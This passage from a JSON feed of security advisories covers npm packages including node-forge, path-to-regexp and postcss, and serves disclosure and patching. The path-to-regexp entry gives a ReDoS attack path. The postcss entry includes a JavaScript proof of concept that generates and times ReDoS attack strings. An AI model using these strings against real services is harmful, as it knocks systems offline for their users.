"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-w7rc-rwvf-8q5r/GHSA-w7rc-rwvf-8q5r.json" } }, { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0-beta.1" }, { "fixed": "3.0.0-beta.9" } ] } ], "database_specific": { 
"last_known_affected_version_range": "\u003c= 3.0.0-beta.8", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-w7rc-rwvf-8q5r/GHSA-w7rc-rwvf-8q5r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15168" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/2358a6c2563d1730a0cdaccc197c611949f6a334" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/eaff0094c4dfdd5b78711a8c4f1b61e33d282072" }, { "type": "PACKAGE", "url": "https://github.com/node-fetch/node-fetch" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-09-10T17:44:09Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2r2c-g63r-vccr", "published": "2022-03-18T23:10:48Z", "modified": "2023-11-08T04:08:35.918577Z", "aliases": [ "CVE-2022-24773" ], "summary": "Improper Verification of Cryptographic Signature in `node-forge`", "details": "### Impact\n\nRSA PKCS#1 v1.5 signature verification code is not properly checking `DigestInfo` for a proper ASN.1 structure. 
This can lead to successful verification with signatures that contain invalid structures but a valid digest.\n\n### Patches\n\nThe issue has been addressed in `node-forge` `1.3.0`.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at [example email address](mailto:security@digitalbazaar.com)", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-2r2c-g63r-vccr/GHSA-2r2c-g63r-vccr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-2r2c-g63r-vccr" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24773" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:10:48Z", "nvd_published_at": "2022-03-18T14:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5rrq-pxf6-6jx5", "published": "2022-01-08T00:22:42Z", "modified": "2022-01-07T22:20:53Z", "summary": "Prototype Pollution in node-forge debug API.", "details": "### Impact\nThe `forge.debug` API had a potential prototype pollution issue if called with untrusted input. The API was only used for internal debug purposes in a safe way and never documented or advertised. 
It is suspected that uses of this API, if any exist, would likely not have used untrusted inputs in a vulnerable way.\n\n### Patches\nThe `forge.debug` API and related functions were removed in 1.0.0.\n\n### Workarounds\nDon't use the `forge.debug` API directly or indirectly with untrusted input.\n\n### References\n- https://www.huntr.dev/bounties/1-npm-node-forge/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge).\n* Email us at support@digitalbazaar.com.", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-5rrq-pxf6-6jx5/GHSA-5rrq-pxf6-6jx5.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5rrq-pxf6-6jx5" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:20:53Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-8fr3-hfg3-gpgp", "published": "2022-01-21T23:36:19Z", "modified": "2023-11-08T04:07:28.545607Z", "aliases": [ "CVE-2022-0122" ], "summary": "Open Redirect in node-forge", "details": "parseUrl functionality in node-forge mishandles certain uses of backslash such as `https:/\\/\\/\\` and interprets the URI as a relative path. 
", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-8fr3-hfg3-gpgp/GHSA-8fr3-hfg3-gpgp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0122" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/db8016c805371e72b06d8e2edfe0ace0df934a5e" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" }, { "type": "WEB", "url": "https://huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2022-01-13T18:49:59Z", "nvd_published_at": "2022-01-06T05:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-92xj-mqp7-vmcj", "published": "2020-09-14T21:42:09Z", "modified": "2025-01-14T08:57:27.810691Z", "aliases": [ "CVE-2020-7720" ], "summary": "Prototype Pollution in node-forge", "details": "The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. 
Note: version 0.10.0 is a breaking change removing the vulnerable functions.", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-92xj-mqp7-vmcj/GHSA-92xj-mqp7-vmcj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7720" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/6a1e3ef74f6eb345bcff1b82184201d1e28b6756" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md#removed" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-609293" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-NODEFORGE-598677" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2020-09-14T21:41:51Z", "nvd_published_at": "2020-09-01T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cfm4-qjh2-4765", "published": "2022-03-18T23:09:54Z", "modified": "2023-11-08T04:08:35.796827Z", "aliases": [ "CVE-2022-24771" ], "summary": "Improper Verification of Cryptographic Signature in node-forge", "details": "### Impact\n\nRSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. 
This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used.\n\n### Patches\n\nThe issue has been addressed in `node-forge` `1.3.0`.\n\n### References\n\nFor more information, please see\n[\"Bleichenbacher's RSA signature forgery based on implementation error\"](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/)\nby Hal Finney.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at [example email address](mailto:security@digitalbazaar.com)", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-cfm4-qjh2-4765/GHSA-cfm4-qjh2-4765.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24771" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:09:54Z", "nvd_published_at": "2022-03-18T14:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gf8q-jrpm-jvxq", "published": "2022-01-08T00:22:02Z", "modified": 
"2022-01-07T22:20:43Z", "summary": "URL parsing in node-forge could lead to undesired behavior.", "details": "### Impact\nThe regex used for the `forge.util.parseUrl` API would not properly parse certain inputs resulting in a parsed data structure that could lead to undesired behavior.\n\n### Patches\n`forge.util.parseUrl` and other very old related URL APIs were removed in 1.0.0 in favor of letting applications use the more modern WHATWG URL Standard API.\n\n### Workarounds\nEnsure code does not directly or indirectly call `forge.util.parseUrl` with untrusted input.\n\n### References\n- https://www.huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at support@digitalbazaar.com\n", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-gf8q-jrpm-jvxq/GHSA-gf8q-jrpm-jvxq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-gf8q-jrpm-jvxq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0122" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge" }, { "type": "WEB", "url": "https://www.huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:20:43Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-wxgw-qj99-44c2", "published": "2022-01-08T00:22:40Z", "modified": "2022-01-07T22:20:50Z", "summary": "Prototype Pollution in node-forge util.setPath API", "details": "### 
Impact\n`forge.util.setPath` had a potential prototype pollution issue if called with untrusted keys. This API was not used by forge itself.\n\n### Patches\nThe `forge.util.setPath` API and related functions were removed in 0.10.0.\n\n### Workarounds\nDon't call `forge.util.setPath` directly or indirectly with untrusted keys.\n\n### References\n- https://security.snyk.io/vuln/SNYK-JS-NODEFORGE-598677\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7720\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge).\n* Email us at support@digitalbazaar.com.", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wxgw-qj99-44c2/GHSA-wxgw-qj99-44c2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-wxgw-qj99-44c2" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:20:50Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-x4jg-mjrx-434g", "published": "2022-03-18T23:10:28Z", "modified": "2023-11-08T04:08:35.855910Z", "aliases": [ "CVE-2022-24772" ], "summary": "Improper Verification of Cryptographic Signature in node-forge", "details": "### Impact\n\nRSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. 
This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.\n\n### Patches\n\nThe issue has been addressed in `node-forge` `1.3.0`.\n\n### References\n\nFor more information, please see\n[\"Bleichenbacher's RSA signature forgery based on implementation error\"](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/)\nby Hal Finney.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at [example email address](mailto:security@digitalbazaar.com)", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-x4jg-mjrx-434g/GHSA-x4jg-mjrx-434g.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-x4jg-mjrx-434g" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24772" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:10:28Z", "nvd_published_at": "2022-03-18T14:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hj48-42vr-x3v9", "published": "2021-08-10T15:33:47Z", "modified": "2025-01-14T08:57:22.791123Z", "aliases": [ "CVE-2021-23343" ], 
"summary": "Regular Expression Denial of Service in path-parse", "details": "Affected versions of npm package `path-parse` are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.", "affected": [ { "package": { "name": "path-parse", "ecosystem": "npm", "purl": "pkg:npm/path-parse" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-hj48-42vr-x3v9/GHSA-hj48-42vr-x3v9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23343" }, { "type": "WEB", "url": "https://github.com/jbgutierrez/path-parse/issues/8" }, { "type": "WEB", "url": "https://github.com/jbgutierrez/path-parse/pull/10" }, { "type": "WEB", "url": "https://github.com/jbgutierrez/path-parse/commit/eca63a7b9a473bf6978a2f5b7b3343662d1506f7" }, { "type": "PACKAGE", "url": "https://github.com/jbgutierrez/path-parse" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a32cb3eda3b19096ad48ef1e7aa8f26e005f2f63765abb69ce08b85@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1279028" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-19T21:02:21Z", "nvd_published_at": "2021-05-04T09:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9wv6-86v2-598j", "published": "2024-09-09T20:19:15Z", "modified": "2025-01-24T21:31:27Z", "aliases": [ "CVE-2024-45296" ], "related": [ "CGA-5gf3-hjcj-6qq8", "CGA-6792-m89f-pxqr", "CGA-9whg-c95h-926g", 
"CGA-fr32-9wwp-hj4r", "CGA-hvqq-cfqx-vpqj", "CGA-m4g6-hwg9-252j", "CGA-p73v-8rhw-pm6p", "CGA-wxf4-3vvq-3j2r", "CGA-x8g8-9rwj-j985" ], "summary": "path-to-regexp outputs backtracking regular expressions", "details": "### Impact\n\nA bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (`.`). For example, `/:a-:b`.\n\n### Patches\n\nFor users of 0.1, upgrade to `0.1.10`. All other users should upgrade to `8.0.0`.\n\nThese versions add backtrack protection when a custom regex pattern is not provided:\n\n- [0.1.10](https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10)\n- [1.9.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0)\n- [3.3.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0)\n- [6.3.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0)\n\nThey do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.\n\nVersion [7.1.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0) can enable `strict: true` and get an error when the regular expression might be bad.\n\nVersion [8.0.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0) removes the features that can cause a ReDoS.\n\n### Workarounds\n\nAll versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change `/:a-:b` to `/:a-:b([^-/]+)`.\n\nIf paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.\n\n### Details\n\nUsing `/:a-:b` will produce the regular expression `/^\\/([^\\/]+?)-([^\\/]+?)\\/?$/`. 
This can be exploited by a path such as `/a${'-a'.repeat(8_000)}/a`. [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) has a good example of why this occurs, but the TL;DR is the `/a` at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the `:a-:b` on the repeated 8,000 `-a`.\n\nBecause JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.\n\n### References\n\n* [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n* [Detailed blog post](https://blakeembrey.com/posts/2024-09-web-redos/)", "affected": [ { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.0" }, { "fixed": "1.9.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.1.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "8.0.0" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "3.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "6.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894" }, { "type": "PACKAGE", "url": "https://github.com/pillarjs/path-to-regexp" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250124-0001" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], 
"github_reviewed": true, "github_reviewed_at": "2024-09-09T20:19:15Z", "nvd_published_at": "2024-09-09T19:15:13Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rhx6-c78j-4q9w", "published": "2024-12-05T22:40:47Z", "modified": "2025-06-03T14:30:56Z", "aliases": [ "CVE-2024-52798" ], "related": [ "CGA-3q69-c424-w54c", "CGA-46v3-9cq9-rx8v", "CGA-677r-6f8m-hg48", "CGA-6j8p-6x42-wj9m", "CGA-h864-qfx6-rqww", "CGA-wwx6-ggqg-hrxj" ], "summary": "path-to-regexp contains a ReDoS", "details": "### Impact\n\nThe regular expression that is vulnerable to backtracking can be generated in versions before 0.1.12 of `path-to-regexp`, originally reported in CVE-2024-45296\n\n### Patches\n\nUpgrade to 0.1.12.\n\n### Workarounds\n\nAvoid using two parameters within a single path segment, when the separator is not `.` (e.g. no `/:a-:b`). 
Alternatively, you can define the regex used for both parameters and ensure they do not overlap to allow backtracking.\n\n### References\n\n- https://github.com/advisories/GHSA-9wv6-86v2-598j\n- https://blakeembrey.com/posts/2024-09-web-redos/", "affected": [ { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.1.12" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-rhx6-c78j-4q9w/GHSA-rhx6-c78j-4q9w.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-rhx6-c78j-4q9w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52798" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4" }, { "type": "WEB", "url": "https://blakeembrey.com/posts/2024-09-web-redos" }, { "type": "PACKAGE", "url": "https://github.com/pillarjs/path-to-regexp" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250124-0002" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2024-12-05T22:40:47Z", "nvd_published_at": "2024-12-05T23:15:06Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g6ww-v8xp-vmwg", "published": "2022-02-10T20:21:24Z", "modified": "2025-01-14T08:57:34.966922Z", "aliases": [ "CVE-2020-7751" ], "summary": "Prototype pollution in pathval", "details": "A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.", "affected": [ { "package": { "name": "pathval", "ecosystem": "npm", "purl": "pkg:npm/pathval" 
}, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-g6ww-v8xp-vmwg/GHSA-g6ww-v8xp-vmwg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7751" }, { "type": "WEB", "url": "https://github.com/chaijs/pathval/pull/58/commits/21a9046cfa0c2697cb41990f3b4316db410e6c8a" }, { "type": "WEB", "url": "https://github.com/chaijs/pathval/pull/58/files" }, { "type": "PACKAGE", "url": "https://github.com/chaijs/pathval" }, { "type": "WEB", "url": "https://github.com/chaijs/pathval/releases/tag/v1.1.1" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PATHVAL-596926" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2021-04-20T17:32:20Z", "nvd_published_at": "2020-10-26T12:17:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-566m-qj78-rww5", "published": "2022-01-07T00:21:36Z", "modified": "2025-01-14T08:57:01.148991Z", "aliases": [ "CVE-2021-23382" ], "summary": "Regular Expression Denial of Service in postcss", "details": "The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. 
The vulnerable regexes are caused mainly by the sub-pattern \n```regex\n\\/\\*\\s* sourceMappingURL=(.*)\n```\n\n### PoC\n```js\nvar postcss = require(\"postcss\")\nfunction build_attack(n) {\n var ret = \"a{}\"\n for (var i = 0; i \u003c n; i++) {\n ret += \"/*# sourceMappingURL=\"\n }\n return ret + \"!\";\n}\n```\n```js\npostcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i \u003c= 500000; i++) {\n if (i % 1000 == 0) {\n var time = Date.now();\n var attack_str = build_attack(i) try {\n postcss.parse(attack_str) var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\");\n } catch (e) {\n var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\");\n }\n }\n}\n```", "affected": [ { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.2.13" } ] } ], "database_specific": { "source": 